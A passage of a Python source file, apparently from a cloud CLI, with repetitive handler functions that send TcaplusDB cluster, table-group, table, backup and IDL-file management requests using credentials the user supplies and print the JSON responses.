show_help("ModifyClusterName", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"ClusterName": argv.get("--ClusterName"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyClusterNameRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyClusterName(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteCluster(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DeleteCluster", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteClusterRequest()
model.from_json_string(json.dumps(param))
rsp = client.DeleteCluster(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyClusterPassword(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyClusterPassword", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"OldPassword": argv.get("--OldPassword"),
"OldPasswordExpireTime": argv.get("--OldPasswordExpireTime"),
"NewPassword": argv.get("--NewPassword"),
"Mode": argv.get("--Mode"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyClusterPasswordRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyClusterPassword(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteIdlFiles(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DeleteIdlFiles", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"IdlFiles": Utils.try_to_json(argv, "--IdlFiles"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteIdlFilesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DeleteIdlFiles(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRecoverRecycleTables(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("RecoverRecycleTables", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RecoverRecycleTablesRequest()
model.from_json_string(json.dumps(param))
rsp = client.RecoverRecycleTables(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateBackup(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CreateBackup", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
"Remark": argv.get("--Remark"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateBackupRequest()
model.from_json_string(json.dumps(param))
rsp = client.CreateBackup(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateTables(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CreateTables", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"IdlFiles": Utils.try_to_json(argv, "--IdlFiles"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
"ResourceTags": Utils.try_to_json(argv, "--ResourceTags"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateTablesRequest()
model.from_json_string(json.dumps(param))
rsp = client.CreateTables(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTableQuotas(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyTableQuotas", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableQuotas": Utils.try_to_json(argv, "--TableQuotas"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTableQuotasRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyTableQuotas(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeClusters(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeClusters", g_param[OptionsDefine.Version])
return
param = {
"ClusterIds": Utils.try_to_json(argv, "--ClusterIds"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
"Ipv6Enable": Utils.try_to_json(argv, "--Ipv6Enable"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeClustersRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeClusters(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteTableGroup(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DeleteTableGroup", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupId": argv.get("--TableGroupId"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteTableGroupRequest()
model.from_json_string(json.dumps(param))
rsp = client.DeleteTableGroup(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTableGroupName(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyTableGroupName", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupId": argv.get("--TableGroupId"),
"TableGroupName": argv.get("--TableGroupName"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTableGroupNameRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyTableGroupName(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateTableGroup(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CreateTableGroup", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupName": argv.get("--TableGroupName"),
"TableGroupId": argv.get("--TableGroupId"),
"ResourceTags": Utils.try_to_json(argv, "--ResourceTags"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateTableGroupRequest()
model.from_json_string(json.dumps(param))
rsp = client.CreateTableGroup(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeRegions(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeRegions", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeRegionsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeRegions(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTasks(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeTasks", g_param[OptionsDefine.Version])
return
param = {
"ClusterIds": Utils.try_to_json(argv, "--ClusterIds"),
"TaskIds": Utils.try_to_json(argv, "--TaskIds"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTasksRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeTasks(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyClusterTags(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyClusterTags", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"ReplaceTags": Utils.try_to_json(argv, "--ReplaceTags"),
"DeleteTags": Utils.try_to_json(argv, "--DeleteTags"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyClusterTagsRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyClusterTags(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTableGroupTags(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyTableGroupTags", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupId": argv.get("--TableGroupId"),
"ReplaceTags": Utils.try_to_json(argv, "--ReplaceTags"),
"DeleteTags": Utils.try_to_json(argv, "--DeleteTags"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTableGroupTagsRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyTableGroupTags(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTableGroupTags(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeTableGroupTags", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupIds": Utils.try_to_json(argv, "--TableGroupIds"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTableGroupTagsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeTableGroupTags(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTableGroups(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeTableGroups", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupIds": Utils.try_to_json(argv, "--TableGroupIds"),
"Filters": Utils.try_to_json(argv, "--Filters"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTableGroupsRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeTableGroups(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCompareIdlFiles(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("CompareIdlFiles", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
"ExistingIdlFiles": Utils.try_to_json(argv, "--ExistingIdlFiles"),
"NewIdlFiles": Utils.try_to_json(argv, "--NewIdlFiles"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CompareIdlFilesRequest()
model.from_json_string(json.dumps(param))
rsp = client.CompareIdlFiles(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeIdlFileInfos(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeIdlFileInfos", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupIds": Utils.try_to_json(argv, "--TableGroupIds"),
"IdlFileIds": Utils.try_to_json(argv, "--IdlFileIds"),
"Offset": Utils.try_to_json(argv, "--Offset"),
"Limit": Utils.try_to_json(argv, "--Limit"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeIdlFileInfosRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeIdlFileInfos(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteTables(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DeleteTables", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteTablesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DeleteTables(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyTableMemos(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ModifyTableMemos", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableMemos": Utils.try_to_json(argv, "--TableMemos"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyTableMemosRequest()
model.from_json_string(json.dumps(param))
rsp = client.ModifyTableMemos(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doVerifyIdlFiles(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("VerifyIdlFiles", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"TableGroupId": argv.get("--TableGroupId"),
"ExistingIdlFiles": Utils.try_to_json(argv, "--ExistingIdlFiles"),
"NewIdlFiles": Utils.try_to_json(argv, "--NewIdlFiles"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.VerifyIdlFilesRequest()
model.from_json_string(json.dumps(param))
rsp = client.VerifyIdlFiles(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doClearTables(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ClearTables", g_param[OptionsDefine.Version])
return
param = {
"ClusterId": argv.get("--ClusterId"),
"SelectedTables": Utils.try_to_json(argv, "--SelectedTables"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile)
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.TcaplusdbClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ClearTablesRequest()
model.from_json_string(json.dumps(param))
rsp = client.ClearTables(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
